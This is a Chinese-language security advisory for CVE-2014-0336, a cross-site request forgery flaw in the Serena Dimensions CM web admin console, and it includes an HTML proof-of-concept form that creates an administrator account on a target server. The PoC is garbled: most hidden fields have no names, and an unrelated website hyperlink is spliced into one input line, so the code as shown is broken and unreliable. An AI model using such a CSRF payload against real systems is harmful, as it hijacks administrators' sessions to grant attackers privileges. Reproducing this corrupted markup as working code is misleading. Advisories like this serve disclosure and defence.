发布日期:2014-03-05
更新日期:2014-03-11
受影响系统:
SERENA Software Inc Serena Dimensions CM
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 65981
CVE(CAN) ID: CVE-2014-0336
Serena Dimensions CM是基于进程的软件更改和配置管理解决方案。
Serena Dimensions CM 12.2 Build 7.199.0及其他版本的Web客户端存在跨站请求伪造漏洞,这可使远程攻击者通过adminconsole/ URI的 user_new_master 参数,利用该漏洞劫持管理员身份验证请求,获取管理员权限。
<*来源:Ken Cijsouw
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Proof-of-Concept:
<html>
<!-- CSRF PoC -->
<body>
<form
action="http://testhost:8080/adminconsole/?jsp=user_new_master&target=merant.adm.dimensions.objects.
User&create=yes" method="POST">
<input type="hidden" value="" />
<input type="hidden" value="HACKTEST1" />
<input type="hidden" value="%24GENERIC%3a%24GLOBAL" />
<input type="hidden"https://www.linuxidc.com/topicnews.aspx?tid=3" target="_blank" title="SUSE">SUSErEdit" value="false" />
<input type="hidden" value="" />
<input type="hidden" value="" />
<input type="hidden" value="" />
<input type="hidden" value="" />
<input type="hidden" value="" />
<input type="hidden" value="MODE%5fCREATE" />
<input type="hidden" value="HACKTEST1" />
<input type="hidden" value="%24GENERIC%3a%24GLOBAL" />
<input type="hidden" value="" />
<input type="hidden" value="1" />
<input type="hidden" value="" />
<input type="hidden"
value="ken1%2ecijsouw%40sincerus%2enl" />
<input type="submit" value="Submit request" />
</form>
</body>
建议:
--------------------------------------------------------------------------------
厂商补丁:
SERENA Software Inc
-------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
参考: